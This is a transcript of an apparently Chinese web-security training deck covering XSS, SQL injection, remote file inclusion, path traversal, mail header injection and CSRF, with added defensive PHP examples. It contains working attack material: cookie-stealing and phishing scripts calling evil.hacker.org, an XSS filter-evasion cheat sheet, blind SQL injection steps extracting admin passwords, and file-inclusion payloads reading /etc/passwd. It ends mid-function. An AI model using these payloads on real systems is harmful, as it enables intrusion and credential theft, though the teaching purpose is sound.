Web Security Solutions V1.0
Published in: Technology

0 Comments
18 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
3,078
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
0
Comments
0
Likes
18
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide
  • Transcript

    • 1. Penetration test, software developer, security analyst, security consultation, whatever
    • 2. Cross-site scripting, injection attacks, remote file execution, CSRF attacks, access control flaws, configuration errors, insecure data storage, insecure direct object references, incomplete authentication and session management, insecure communication
    • 3. Intrusion Techniques Exchange: Defending Against XSS
    • 4.  
    • 5. Stored XSS as an "interactive game" between the attacker, the vulnerable website and the Internet user (diagram: Attacker, Web Server, Client):
      1. The attacker posts malicious code to the server
      2. The database stores the malicious code
      3. An Internet user clicks the topic
      4. The data is sent to the Internet user
      5. The browser executes the malicious code
      Post Forum Message: Subject: Free Olympic tickets!!! Content: <script> attack code </script>
      Forum topic list: Yao Ming… / Liu Xiang… / Zheng Zhi… / Guo Jingjing… / Team China ..... / Free Olympic tickets!!! <script> attack code </script>
      Get /forum.php?fid=122&mid=241 → !!! attack code !!!
    • 6. Same flow as slide 5 (diagram: Attacker, Client, Web Server; forum post "Free Olympic tickets!!!" carrying <script> attack code </script>; Get /forum.php?fid=122&mid=241); here the executed code steals the client's cookies.
    • 7. Same flow; the executed code phishes the username/password.
    • 8. Same flow; the executed code sends the client to a spoofed server.
    • 9. Same flow; the executed code enrols the client's browser in a botnet.
    • 10. <?php print 'welcome '.$_GET['name']; ?>
      http://example/welcome.php?name=Wong_Bin
      <HTML> <Body> Welcome Wong_Bin </Body> </HTML>
    • 11. <?php print 'welcome '.$_GET['name']; ?>
      http://example/welcome.php?name=<script>alert("XSS")</script>
      <HTML> <Body> Welcome <script>alert("XSS")</script> </Body> </HTML>
    • 12. Update your email address (the form, update.php, and the page that displays the stored value):
      <Font size=5> Update your email address</font>
      <form name="inject" method="post" action="http://example/update.php">
      <input type="text" name="search" size=60> <input type="submit" value=" 确定 ">
      </form>
      <?php ...
      $email = $_GET['email'];
      $query = "update user set email='$email' where name='wong'";
      $db_query = mysql_db_query($dbname, $query);
      $db_result = mysql_num_rows($db_query);
      if ($db_result) { print "Success update... "; }
      ?>
      <?php ...
      $query = "select email from user where name = 'wong'";
      $db_query = mysql_db_query($dbname, $query);
      $db_result = mysql_result($db_query, 0);
      if ($db_result) { echo "<p>EMAIL Address: $db_result <p>"; }
      ?>
      Rendered: <HTML> EMAIL Address: huangbin@nsfocus.com </HTML> (form: [email_address], "Update your email address", OK)
    • 13. Same form and code as slide 12, but the submitted address is
      huangbin@nsfocus.com<script>document.location='http://evil.hacker.org/steal_cookies.php?cookies='+encodeURI(document.cookie);</script>
      The stored value is echoed without encoding, so each visitor's cookies go to http://evil.hacker.org. Steal Cookies!!!
    • 14. Phishing through stored XSS (diagram: Attacker, Client, Web Server). The forum post "Free Olympic tickets!!!" carries <script> attack code </script>; when the client fetches Get /forum.php?fid=122&mid=241 the script rewrites the page into a fake login form:
      <HTML> Welcome to the Olympic forum! Username: Password: </HTML>
      The user enters username and password and logs in……; User_information.txt on the attacker's side records the username and password.
      (Other topics in the list: Liu Xiang… / Zheng Zhi… / Guo Jingjing / Team China .....)
    • 15. The injected phishing code (attacker side) and the harvesting script:
      … <body background=javascript:evil=document.createElement("script");evil.src="http://evil.hack.org/xss.js";document.body.appendChild(evil);> …
      <SCRIPT language=JavaScript>
      function Phishing() {
          evil_code = Make a Phishing Page by …
          document.write(evil_code);
      }
      Phishing()
      </SCRIPT>
      ...
      <form>action="user_infomation.php" method="post" onsubmit="evilImg=new Image; evil.src='http://evil.hacker.org/'+document.forms(1).login.value'+':'+ document.forms(1).password.value;"</form>
      ...
      <?php
      if (isset($_POST['username']) && isset($_POST['password'])) {
          $filename = "/www/user_information.txt";
          $file = @fopen($file_path, "a");
          $info = "user: ".$_POST['username']." passwd:".$_POST['password']." ";
          @fwrite($file, $info);
          @fclose($file);
      }
      ?>
      Phishing page shown to the client: "Please log in again" / User: / Password: / OK / Cancel
    • 16. Normally: <INPUT TYPE="image" SRC="http://example">
      Evil: <INPUT TYPE="image" SRC="http://example"><script>alert('xss')</script>
    • 17. Danger: '<script.*>'
      Weak: replace(str,"<","&lt;") replace(str,">","&gt;")
    • 18. Evil: <INPUT TYPE="image" SRC=javascript:alert("xss") >
      Danger: javascript:
      Not so good:
      Dim re
      Set re = new RegExp
      re.IgnoreCase = True
      re.Global = True
      re.Pattern = "javascript:"
      Str = re.replace(Str, "javascript : ")
      re.Pattern = "jscript:"
      Str = re.replace(Str, "jscript : ")
      re.Pattern = "vbscript:"
      Str = re.replace(Str, "vbscript : ")
      Set re = nothing
    • 19. Evil: <INPUT TYPE="image" SRC=javascript&#58alert("xss")>
      Danger: '&'
      Weak: replace(str,"&","&amp;")
    • 20. Evil: <img src="javas cript:alert('xss')"> (whitespace inside the scheme name)
      Danger: whitespace
      Weak: replace(str," ","&nbsp;")
    • 21. Evil looking: http://example/weak.php?username=%3A%69%6E%70%75%74%21%74%79%70%65%3D%68%69%64%64%65%6E%20%76%61%6C%75%65%3D%47%6F%74%63%68%61%21%20%6E%61%6D%66%20%3D%20%78%3E%20%3C%73%63%71%69%71%74%3E%20%61%6C%65%72%71%28%78%2C%76%61%6C%75%65%29%27%3C%2F%73%63%72%69%70%74%3E%4A%69%6C
      which the server sees as: http://example/weak.php?username=<input type=hidden value=v name = x> <script>alert(x.value)</script>
      Wrong
    • 22. Danger input / Encoding input:
      function safe_html($msg) {
          $msg = str_replace('&amp;', '&', $msg);
          $msg = str_replace('&nbsp;', ' ', $msg);
          $msg = str_replace('&quot;', '&quot;', $msg);
          $msg = str_replace("'", '&#39;', $msg);
          $msg = str_replace("<", "&lt;", $msg);
          $msg = str_replace(">", "&gt;", $msg);
          $msg = str_replace(" ", " &nbsp; &nbsp;", $msg);
          $msg = str_replace(" ", "", $msg);
          $msg = str_replace(" ", " &nbsp; ", $msg);
          return $msg;
      }
    • 23. Evil: <img src="#" onerror=alert(/xss/)>
      Evil: <img src="#" style="evil:expression(alert(/xss/));">
      Evil: <img src="#"/**/onerror=alert(/xss/) >
    • 24. Data flow: HTML form → web application → database → web application → browser
    • 25. The same flow with three points of defence:
      Beforehand: replace(str, safer, danger) …… on the input
      During: htmlspecialchars($html, ENT_QUOTES) …… on the output
      Afterwards: Firefox NoScript …… in the browser
    • 26.
        •  Danger
        •  Danger
    • 27. Danger:
      POST /thepage.jsp?var1=page1.html HTTP/1.1
      Accept: */*
      Referer: http://www.myweb.com/index.html
      Accept-Language: en-us,de;q=0.5
      Accept-Encoding: gzip, deflate
      Content-Type: application/x-www-url-encoded
      Content-Length: 59
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
      Host: www.myweb.com
      Connection: Keep-Alive

      uid=fred&password=secret&pagestyle=default.css&action=login
    • 28. '<script.*>' versus:
      <table background=javascript:evil()>
      <tr background=javascript:evil()>
      <body background=javascript:evil()>
    • 29. <input type='image' src=javascript:evil()>
      <img src='javascript:evil()'>
      <frameset> <frame src="javascript:danger()">...
    • 30. <link rel="stylesheet" href=javascript:evil()>
      <base href=javascript:evil()>
    • 31. <meta http-equiv="refresh" content="0;url=javascript:danger()">
      <p style='background-image: url("javascript:danger();")'>
      <a href='javascript:danger();'>
    • 32. <body onload='danger();'>
      <div onmouseover='danger();'>
      <div onscroll='danger();'>
    • 33. <div onmouseenter='danger();'>
    • 34. <object type="text/x-scriptlet" data="evil.com/danger.js">
      <style>@import evil.com/danger.js</style>
      <div style="width:expression(danger();)">
    • 35. [IE] <div style="behaviour: url( [link to code] );">
      [Mozilla] <div style="binding: url( [link to code] );">
      [IE] <div style="width: expression( [code] );">
      [N4] <style type="text/javascript">[code]</style>
      [IE] <object classid="clsid:..." codebase="javascript:[code]">
      <style><!--</style> <script>[code]//--></script>
      <![CDATA[<!--]]> <script>[code]//--></script>
      <!-- -- --> <script>[code]</script> <!-- -- -->
      < <script>[code]</script>
      <img src="blah"onmouseover="[code]">
      <img src="blah>" onmouseover="[code]">
      <xml src="javascript:[code]">
      <xml id="X"><a><b>&lt;script>[code]&lt;/script>;</b></a></xml> <div datafld="b" dataformatas="html" datasrc="#X"></div>
      [UTF-8; IE, Opera] [xC0][xBC]script>[code][xC0][xBC]/script>
      <a href="javas&#99;ript&#35;[code]">
      <div onmouseover="[code]">
      <img src="javascript:[code]">
      [IE] <img dynsrc="javascript:[code]">
      [IE] <input type="image" dynsrc="javascript:[code]">
      [IE] <bgsound src="javascript:[code]">
      & <script>[code]</script>
      [N4] &{[code]};
      [N4] <img src=&{[code]};>
      <link rel="stylesheet" href="javascript:[code]">
      [IE] <iframe src="vbscript:[code]">
      [N4] <img src="mocha:[code]">
      [N4] <img src="livescript:[code]">
      <a href="about:<s&#99;ript>[code]</script>">
      <meta http-equiv="refresh" content="0;url=javascript:[code]">
      <body onload="[code]">
      <div style="background-image: url(javascript:[code]);">
    • 36. Htmlspecialchars() / Strip_tags():
      $str = strip_tags($_POST['message'], '<b><p><i><u>');
      $str = htmlentities($str);
      echo nl2br($str);
    • 37. <?php
      $html = '<p><i><s>Welcome to Nsfocus!</i></p></s>';
      print strip_tags($html);
      print ' ';
      // Allow <p><i><s>
      print strip_tags($html, '<p><i><s>');
      ?>
      <?php
      $html = '<script>alert("xss attack!!")</script>';
      print strip_tags($html);
      print " ";
      // Allow <script>
      print strip_tags($html, '<script>');
      ?>
      Rendered: Welcome to Nsfocus! alert("xss attack!!")
    • 38. <?php
      $html = "<a href='http://example'>evil link</a>";
      $new_html = htmlspecialchars($html, ENT_QUOTES);
      // &lt;a href=&#039;http://example&#039;&gt;evil link&lt;/a&gt;
      print $html." ";
      print $new_html;
      ?>
      <?php
      $html = '<script>alert("xss attack!!")</script>';
      $new_html = htmlspecialchars($html, ENT_QUOTES);
      // &lt;script&gt;alert(&quot;xss attack!!&quot;)&lt;/script&gt;
      print $new_html." ";
      print $html;
      ?>
      Rendered: evil link alert("xss attack!!") <a href='http://example'>evil link</a>
    • 39. <?php
      $html = "<a href='http://example'>evil link</a>";
      $new_html = htmlspecialchars($html, ENT_QUOTES);
      // &lt;a href=&#039;http://example&#039;&gt;evil link&lt;/a&gt;
      print $html." ";
      print $new_html;
      ?>
      <?php
      $html = '<script>alert("xss attack!!")</script>';
      $new_html = htmlentities($html, ENT_QUOTES, 'UTF-8');
      // &lt;script&gt;alert(&quot;xss attack!!&quot;)&lt;/script&gt;
      print $new_html." ";
      print $html;
      ?>
      Rendered: evil link alert("xss attack!!") <a href='http://example'>evil link</a>
    • 40. Input sources: $_GET['message'], $_POST['message'], $_REQUEST['message'], $_FILES['message'], $_COOKIE['message'], $_SESSION['message'], $_SERVER['message'], $_ENV['message'], $HTTP_GET_VARS['message'], more…
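An added example (my code, not the deck's) that applies the encode-on-output approach of slides 25 and 36 to 39 to the three places the attack slides target: HTML text, attribute values and URL-valued attributes such as src/href. It assumes PHP 7.1 or later; html_text(), safe_url() and render_post() are names chosen here.

```php
<?php
// Added example, not from the original deck: encode untrusted values for the
// context they land in, and allow-list URL attributes instead of searching for
// forbidden substrings. html_text(), safe_url() and render_post() are names
// chosen here.

// For HTML text nodes and quoted attribute values. ENT_QUOTES also encodes the
// single quote, so the result is safe inside '...' attributes as well.
function html_text(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// For src/href values. Nothing here looks for "javascript:"; instead only
// http(s) URLs and root-relative paths are accepted, and any value containing
// whitespace or control characters fails closed. That covers the javascript:,
// vbscript:, "javas<tab>cript:" and "javascript&#58" spellings on the slides:
// whether or not a half-written entity gets decoded, the value does not start
// with an allowed scheme and is replaced by "#".
function safe_url(string $url): string
{
    $decoded = html_entity_decode($url, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    if (preg_match('/[\x00-\x20\x7f]/', $decoded)) {
        return '#';
    }
    if (!preg_match('#\A(?:https?://|/(?!/))#i', $decoded)) {
        return '#';
    }
    return html_text($decoded);
}

// Renders one forum post the way forum.php on slide 5 should: every untrusted
// value goes through the encoder for its context, including the link.
function render_post(string $subject, string $body, string $link): string
{
    return '<h2>' . html_text($subject) . '</h2>'
         . '<p>' . html_text($body) . '</p>'
         . '<a href="' . safe_url($link) . '">more</a>';
}

// Constructed inputs, taken from the deck's attack slides (16, 18 to 21, 23).
$cases = [
    ['Free Olympic tickets!!!', '<script>alert("XSS")</script>', 'http://example/forum.php?fid=122&mid=241'],
    ['pic', '<img src="#" onerror=alert(/xss/)>', 'javascript:alert("xss")'],
    ['pic', '<img src="#"/**/onerror=alert(/xss/) >', "javas\tcript:alert('xss')"],
    ['pic', '<img src="#" style="evil:expression(alert(/xss/));">', 'javascript&#58alert("xss")'],
    ['pic', '<input type=hidden value=v name=x><script>alert(x.value)</script>', '/forum.php?fid=122'],
];
foreach ($cases as [$subject, $body, $link]) {
    echo render_post($subject, $body, $link), "\n";
}
```

Every script fragment comes out as inert text and every non-http link becomes "#"; the one legitimate forum URL survives with its & encoded as &amp;.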
    • 41.  
    • 42. Intrusion Techniques Exchange: Defending Against SQL Injection
    • 43.  
    • 44. Login form (rendered: Username: / Password: / OK / Cancel) and login.php:
      ...
      <form action="login.php" method="post" name="login">
      用户 :<input type="text" name="username" value="" maxlength="20">
      密码 :<input type="password" name="password" value="" maxlength="20">
      <INPUT TYPE=submit name="confirm" value=" 确定 ">
      <INPUT TYPE=reset name="cancel" value=" 取消 ">
      </form>
      ...
      <?php
      $query = "select * from user where username='{$_GET['username']}' and password='{$_GET['password']}'";
      $db_query = mysql_db_query($dbname, $query);
      $db_result = mysql_fetch_array($db_query);
      if ($db_result) { print "Success in... "; }
      ?>
      Query template: select * from user where username='$_GET['username']' and password='$_GET['password']'
    • 45. Username admin and password ' or ''=' give
      select * from user where username='admin' and password='' or ''=''
      Success in…
    • 46. Worse: username ';Delete from users;/* gives
      select * from user where username='';Delete from users;/*…
      Success in…
    • 47. Search page (rendered: Search page: / OK) and Search.php:
      <Font size=5>Search page</font>
      <form name="inject" method="post" action="http://example/Search.php">
      <input type="text" name="name" size=60> <input type="submit" value=" 确定 ">
      </form>
      <?php
      $search_name = $_GET['search_name'];
      $query = "select * from user where username like '%$search_name%' order by id desc";
      $db_query = mysql_db_query($dbname, $query);
      $db_result = mysql_num_rows($db_query);
      if ($db_result) { print "Search result... "; }
      ?>
      Query template: select * from user where username like '%$search_name%' order by id desc
    • 48. Search input %' order by id# gives
      select * from user where username like '%%' order by id#%' order by id desc
      All usernames show…
    • 49. Update your password (rendered: Update your password: / OK) and update.php:
      <Font size=5>Update your password</font>
      <form name="update" method="post" action="http://example/update.php">
      <input type="text" name="password" size=20> <input type="submit" value=" 确定 ">
      </form>
      <?php
      $passwd = $_GET['password'];
      $query = "update user set passwd='$passwd' where uid='$uid'";
      $db_query = mysql_db_query($dbname, $query);
      $db_result = mysql_num_rows($db_query);
      if ($db_result) { print "Success in update... "; }
      ?>
      Query template: update user set passwd='$passwd' where uid='$uid'
    • 50. New password 123' where uid='1'/* submitted by uid 252 gives
      update user set passwd='123' where uid='1'/*where uid='252'
      Uid 1's password is changed
    • 51. Error messages leak data (diagram: Attacker, Web Server):
      Get /query.php?name=Wong'                           → FALSE
      Get /query.php?name=Wong' and LEFT(password,1)='i  → FALSE
      Server error: MySQL server: syntax error converting the varchar value "luyq@#11". /show/query.php, line 87
      So the password is luyq@#11
    • 52. Debug switches reachable by the client (diagram: Attacker, Web Server):
      Post /attacktarget?errors=Y&debug=5  → Show more …
      Get /query.php?user=joe'             → Error message: $debug = 1 …
    • 53. Take care: show_source(), highlight_string(), highlight_file() and other functions that show source or error messages…
      Better: error_reporting(); in php.ini: display_errors = off
    • 54. 1. Identify the injection point (MSSQL SERVER!!; diagram: Attacker, Web Server):
      Get /query.asp?name=Wong '         → FALSE
      Get /query.asp?name=Wong and 1=1   → TRUE
      Get /query.asp?name=Wong and 1=2   → FALSE
    • 55. 2. Probe the database structure (MYSQLSERVER!!):
      Get /query.asp?name=Wong and (select count(*) from admin)>=0         → TRUE
      Get /query.asp?name=Wong and (select count(user) from admin)>=0      → FALSE
      Get /query.asp?name=Wong and (select count(username) from admin)>=0  → TRUE
      … table admin, column username..
    • 56. 3. Probe the username and password length (MSSQL SERVER!!):
      Get /query.asp?name=Wong and (select top 1 len(username) from admin)>5   → TRUE
      Get /query.asp?name=Wong and (select top 1 len(username) from admin)<10  → TRUE
      Get /query.asp?name=Wong and (select top 1 len(username) from admin)=8   → TRUE
      … username 5 characters, password 8 characters
    • 57. 4. Probe the username and password (MSSQL SERVER!!):
      Get /query.asp?name=Wong and 1=(select count(*) from admin where id=1 and mid(username,1,1)='a')  → TRUE
      Get /query.asp?name=Wong and 1=(select count(*) from admin where id=1 and mid(username,2,1)='r')  → FALSE
      … username: admin, password: jjyy@!&1
    • 58. 1. Identify the injection point (MYSQL SERVER!!):
      Get /query.php?name=joe'           → FALSE
      Get /query.php?name=joe' and 1=1   → TRUE
      Get /query.php?name=joe' and 1=2   → FALSE
    • 59. 2. Probe the password length (MYSQLSERVER!!):
      Get /query.php?name=joe' and LENGTH(password)>'5   → TRUE
      Get /query.php?name=joe' and LENGTH(password)<'15  → TRUE
      Get /query.php?name=joe' and LENGTH(password)='13  → TRUE
      … password 13 characters
    • 60. 3. Probe the password (MYSQL SERVER!!):
      Get /query.asp?name=joe' and LEFT(password,1)='m  → FALSE
      Get /query.asp?name=joe' and LEFT(password,1)='i  → TRUE
      Get /query.asp?name=joe' and LEFT(password,2)='f  → FALSE
      … password 13 characters; the password is ilovepassword
    • 61. 4. Probe other tables (MSSQL SERVER!!):
      Get /query.php?name=joe' union select 1,1,1,1,1 from root_user/*     → FALSE
      Get /query.php?name=admin' union select 1,1,1,1,1 from admin_user/*  → TRUE
      … password 12 characters, password ilovepassword; guessed the admin_user table that holds administrator information
    • 62. 5. Obtain the username and password:
      Get /query.php?name=joe' and 1<>1 union select 1,1,name,1,1,passwd,1 from admin_user /*  → TRUE
      … username: admin, password: fly_you ! @#
    • 63. Reading files through the injection (diagram: Client, Web Server):
      Get /query.php?name=-1' union select 1,1,1,1,load_file('c:/boot.ini')  → contents of C:\boot.ini
    • 64. Validation flow: input → data length check → data type check → data character check; each step asks "legal?" and passes the data on if yes, otherwise → error prompt.
    • 65. Client side: input → client-side check/filter → legal? yes: submit; no: error prompt. The client-side check can be bypassed, so the server repeats it: input → server-side check/filter → legal? yes: process the submitted information; no: error prompt and record the attack → server response.
    • 66. Danger! characters: < > & ' " + ; {Whitespace} % / #
    • 67. addslashes, mysql_real_escape_string, PDO, escapeshellarg, escapeshellcmd, magic_quotes_gpc, register_globals, safe_mode, allow_url_fopen, open_basedir, disable_functions
      Note: the solutions part is still thin and needs more time to complete……
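An added example (my code, not the deck's): the login, search and password-update queries from slides 44 to 50 rewritten with the PDO prepared statements that slide 67 lists, run against an in-memory SQLite database (assumed available through the pdo_sqlite extension) so the slides' payloads can be replayed offline. setup(), login(), search() and change_password() are names chosen here.

```php
<?php
// Added example, not from the original deck: the three vulnerable queries from
// slides 44 to 50 rewritten with PDO prepared statements (slide 67). Runs on an
// in-memory SQLite database, assumed available via the pdo_sqlite extension.

function setup(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE user (uid INTEGER PRIMARY KEY, username TEXT, password TEXT)');
    $ins = $db->prepare('INSERT INTO user (uid, username, password) VALUES (?, ?, ?)');
    // Constructed rows. Passwords are stored as salted hashes rather than the
    // deck's md5(); password_hash() is PHP's built-in for this.
    foreach ([[1, 'admin', 'admin-secret'], [252, 'wong', 'wong-secret']] as [$uid, $u, $p]) {
        $ins->execute([$uid, $u, password_hash($p, PASSWORD_DEFAULT)]);
    }
    return $db;
}

// Slides 44 to 46: login. The password never enters the SQL text; the row is
// fetched by username and the hash is verified in PHP, so "' or ''='" and
// "';Delete from users;/*" are just strings that match no user.
function login(PDO $db, string $username, string $password): bool
{
    $st = $db->prepare('SELECT password FROM user WHERE username = ?');
    $st->execute([$username]);
    $hash = $st->fetchColumn();
    return $hash !== false && password_verify($password, $hash);
}

// Slides 47 and 48: search. The wildcards belong to the bound value, not to the
// statement, so "%' order by id#" cannot reach the ORDER BY clause.
function search(PDO $db, string $name): array
{
    $st = $db->prepare('SELECT username FROM user WHERE username LIKE ? ORDER BY uid DESC');
    $st->execute(['%' . $name . '%']);
    return $st->fetchAll(PDO::FETCH_COLUMN);
}

// Slides 49 and 50: change password. uid comes from the authenticated session,
// never from the request, and "123' where uid='1'/*" cannot cut off the WHERE.
function change_password(PDO $db, int $uid, string $newPassword): int
{
    $st = $db->prepare('UPDATE user SET password = ? WHERE uid = ?');
    $st->execute([password_hash($newPassword, PASSWORD_DEFAULT), $uid]);
    return $st->rowCount(); // number of rows actually updated
}

$db = setup();
var_dump(login($db, 'admin', "' or ''='"));             // slide 45 payload as the password
var_dump(login($db, "';Delete from users;/*", 'x'));     // slide 46 payload as the username
var_dump(login($db, 'admin', 'admin-secret'));           // the real credentials
var_dump(search($db, "%' order by id#"));                // slide 48 payload
var_dump(search($db, 'adm'));                            // an ordinary search
var_dump(change_password($db, 252, "123' where uid='1'/*")); // slide 50 payload, sent by uid 252
var_dump(login($db, 'admin', 'admin-secret'));           // admin's password is untouched
```

A user-supplied `%` or `_` still acts as a LIKE wildcard inside the bound value; escape them too if a literal search is required.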
    • 68. Intrusion Techniques Exchange: Defending Against Malicious File Execution
    • 69.  
    • 70. Remote file inclusion (diagram: Web Server, Attacker):
      Get /script.php?file=http%3A%2F%2Fevil.hacker.org%2Fevilscript.txt
      root:x:0:0:root:/root:/bin/bash
      bin:x:1:1:bin:/bin:/sbin/nologin
      daemon:x:2:2:daemon:/sbin:/sbin/nologin
      adm:x:3:4:adm:/var/adm:/sbin/nologin
      lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
      sync:x:5:0:sync:/sbin:/bin/sync
      shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
      halt:x:7:0:halt:/sbin:/sbin/halt
      mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
      ...
    • 71. Vulnerable script: <?php include($_GET['file'].".php"); ?>
      Request: Get /script.php?file=http%3A%2F%2Fevil.hacker.org%2Fevilscript.txt
      evilscript.txt: <?php print file_get_contents('/etc/passwd'); ?>
    • 72. Same script and request; evilscript.txt: <?php var_dump(get_defined_vars()); die(); ?>
    • 73. Same script and request; evilscript.txt:
      <?php
      print "Guess user & password demo ";
      include('http://evil.hacker.org/userGuesses.php');
      foreach ($userGuesses as $user => $password) {
          $connection = @mysql_connect('localhost', $user, $password);
          if ($connection) {
              print "Success with username: $user. Using password: $password ";
          }
      }
      ?>
    • 74. Wrong: <?php include($_GET['file'].".php"); ?>
      Right: allow_url_fopen / allow_url_include (php.ini)
      Advise: include only from a fixed list:
      <?php
      $page = array(
          'contact' => 'contact.php',
          'help'    => 'help.php',
          'query'   => 'query.php');
      if (array_key_exists($_GET['file'], $page)) {
          include('/full/path/'.$page[$_GET['file']]);
      }
      ?>
    • 75. Path traversal (diagram: Attacker, Web Server): Get /del.php?user=../etc&file=passwd → Del /etc/passwd success; Post file=passwd → Success; Post…
    • 76. <?php
      // delete the named file from the user's directory
      $username = $_GET['user'];
      $homedir = "/home/$username";
      $file_to_delete = "$userfile";
      unlink("$homedir/$userfile");
      echo "$file_to_delete has been deleted!";
      ?>
      With Get /del.php?user=../etc&file=passwd the same code evaluates to:
      <?php
      // deletes any file on disk that PHP has permission to access
      $file_to_delete = $_GET['file'];
      $username = "../etc/";
      $homedir = "/home/../etc/";
      $file_to_delete = "passwd";
      unlink("/home/../etc/passwd");
      echo "/home/../etc/passwd has been deleted!";
      ?>
    • 77. Right:
      <?php
      $username = $_SERVER['REMOTE_USER'];              // use the authentication mechanism
      $homedir = "/home/$username";
      $file_to_delete = basename("$userfile");           // strip any path from the variable
      unlink("$homedir/$file_to_delete");
      $fp = fopen("/home/logging/filedelete.log", "a");  // log the deletion
      $logstring = "$username $homedir $file_to_delete";
      fwrite($fp, $logstring);
      fclose($fp);
      echo "$file_to_delete has been deleted!";
      ?>
      Better:
      <?php
      $username = $_SERVER['REMOTE_USER'];              // use the authentication mechanism
      $homedir = "/home/$username";
      if (!ereg('^[^./][^/]*$', $userfile)) die('bad filename');  // stop executing
      if (!ereg('^[^./][^/]*$', $username)) die('bad username');  // stop executing
      ?>
    • 78. And: give the PHP web user only very limited permissions!
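An added example (my code, not the deck's) of del.php from slides 75 to 77 with slide 77's name rule applied to both values and, on top of it, the final path resolved and checked against the home directory. It assumes a Unix filesystem; is_plain_name(), user_file_path() and delete_user_file() are names chosen here, and the home root is a parameter so the demo can run on a temporary tree.

```php
<?php
// Added example, not the deck's code: del.php from slides 75 to 77, with the user
// name and file name validated by slide 77's rule (no '/', no leading '.') and
// the resolved path checked against the home directory. is_plain_name(),
// user_file_path() and delete_user_file() are names chosen here.

function is_plain_name(string $s): bool
{
    // Same rule as the deck's ereg('^[^./][^/]*$', ...), in PCRE form.
    return preg_match('#\A[^./][^/]*\z#', $s) === 1;
}

function user_file_path(string $homeRoot, string $username, string $userfile): ?string
{
    if (!is_plain_name($username) || !is_plain_name($userfile)) {
        return null;
    }
    $home = realpath($homeRoot . '/' . $username);
    $path = realpath($homeRoot . '/' . $username . '/' . $userfile);
    if ($home === false || $path === false || !is_file($path)) {
        return null; // no such home or file (also covers dangling symlinks)
    }
    // realpath() has followed every ".." and symlink, so the resolved file must
    // still sit directly under the resolved home directory.
    if (dirname($path) !== $home) {
        return null;
    }
    return $path;
}

function delete_user_file(string $homeRoot, string $username, string $userfile): bool
{
    $path = user_file_path($homeRoot, $username, $userfile);
    return $path !== null && unlink($path);
}

// Constructed demo tree: <tmp>/home/wong/notes.txt and <tmp>/etc/passwd, the
// file that the deck's "user=../etc&file=passwd" request reached.
$root = sys_get_temp_dir() . '/del_demo_' . bin2hex(random_bytes(4));
mkdir("$root/home/wong", 0700, true);
mkdir("$root/etc", 0700, true);
file_put_contents("$root/home/wong/notes.txt", "mine\n");
file_put_contents("$root/etc/passwd", "root:x:0:0:root:/root:/bin/bash\n");
$homeRoot = "$root/home";

var_dump(delete_user_file($homeRoot, '../etc', 'passwd'));          // rejected: bad username
var_dump(delete_user_file($homeRoot, 'wong', '../../etc/passwd'));  // rejected: bad filename
var_dump(delete_user_file($homeRoot, 'wong', 'passwd'));            // rejected: no such file in home
var_dump(file_exists("$root/etc/passwd"));                          // the target is still there
var_dump(delete_user_file($homeRoot, 'wong', 'notes.txt'));         // the user's own file is removed

// Remove the demo tree.
@unlink("$root/etc/passwd");
rmdir("$root/etc");
rmdir("$root/home/wong");
rmdir("$root/home");
rmdir($root);
```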
    • 79. <?php
      $to = 'nobody@example.com';
      $subject = 'the subject';
      $message = 'hello';
      $from = $_POST['from'];
      mail($to, $subject, $message, $from);
      ?>
      POST [email_address] → mail with To: [email_address] Subject: the subject From: [email_address]
    • 80. Same code; POST fake@example.org Bcc:evil@example.com Reply-To:evil2@example.com (each on its own line) → mail with To: [email_address] Subject: the subject From: [email_address] Bcc: [email_address] Reply-To: [email_address] …
    • 81. Right:
      <?php
      $to = 'nobody@example.com';
      $subject = 'the subject';
      $message = 'hello';
      $from = $_POST['from'];
      if (!ctype_print($from)) {
          print "Error post ";
      } else {
          mail($to, $subject, $message, $from);
      }
      ?>
      Better:
      <?php
      $to = 'nobody@example.com';
      $subject = 'the subject';
      $message = 'hello';
      $from = $_POST['from'];
      if (!ctype_print($from)) {
          write_logs($_SERVER['REMOTE_ADDR'], $from);  // write_logs(IP, MESSAGE) is the deck's placeholder for its logging routine
          print "Your IP has been logged… ";
      } else {
          mail($to, $subject, $message, $from);
      }
      ?>
    • 82. Intrusion Techniques Exchange: Defending Against CSRF
    • 83.  
    • 84. CSRF through a stored script (diagram: Attacker, Client, Web Server 192.168.1.10, trusted domain):
      1. The attacker posts malicious code to the server
      2. The database stores the malicious code
      3. An Internet user visits the website (login; webpage + cookies)
      4. The Internet user clicks the topic
      5. The browser executes the malicious code
      6. The code performs a dangerous operation with the user's cookies inside the trusted domain (evil)
      Post Forum Message: Subject: Free Olympic tickets!!! Content: <script> attack code </script>; Get /forum.php?fid=122&mid=241 → !!! attack code !!! (topic list: Yao Ming… / Liu Xiang… / Zheng Zhi… / Guo Jingjing… / Team China .....)
    • 85. Attacker versus the Myspace filter:
      Post <div style="background:url()"> → Cool! (allowed)
      Post <script.*>, onclick, <a href=javascript://> … → False (blocked)
      Post <div style="background:url('javascript:evil()')"> → False
      Post <div style="background:url('java script:evil()')"> → False
      Post <div style="background:url('java&#58script:evil()')"> → Cool!!! Hello, web worm!
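An added example (my code, not from the deck) of the defence the CSRF slides leave implicit: a per-session synchroniser token that the forum post form on slides 84 and 85 must send back. The session is passed in as an array so the check can be exercised without a web server; csrf_token(), csrf_field(), csrf_check() and handle_post() are names chosen here.

```php
<?php
// Added example, not from the original deck: a per-session anti-CSRF token for
// the forum post form on slides 84 and 85. Session storage is passed in as an
// array so the logic runs without a web server; the function names are mine.

function csrf_token(array &$session): string
{
    if (empty($session['csrf'])) {
        $session['csrf'] = bin2hex(random_bytes(32)); // unguessable, one per session
    }
    return $session['csrf'];
}

// The hidden field for the form; the value is encoded like any other output.
function csrf_field(array &$session): string
{
    return '<input type="hidden" name="csrf" value="'
         . htmlspecialchars(csrf_token($session), ENT_QUOTES, 'UTF-8') . '">';
}

function csrf_check(array $session, array $post): bool
{
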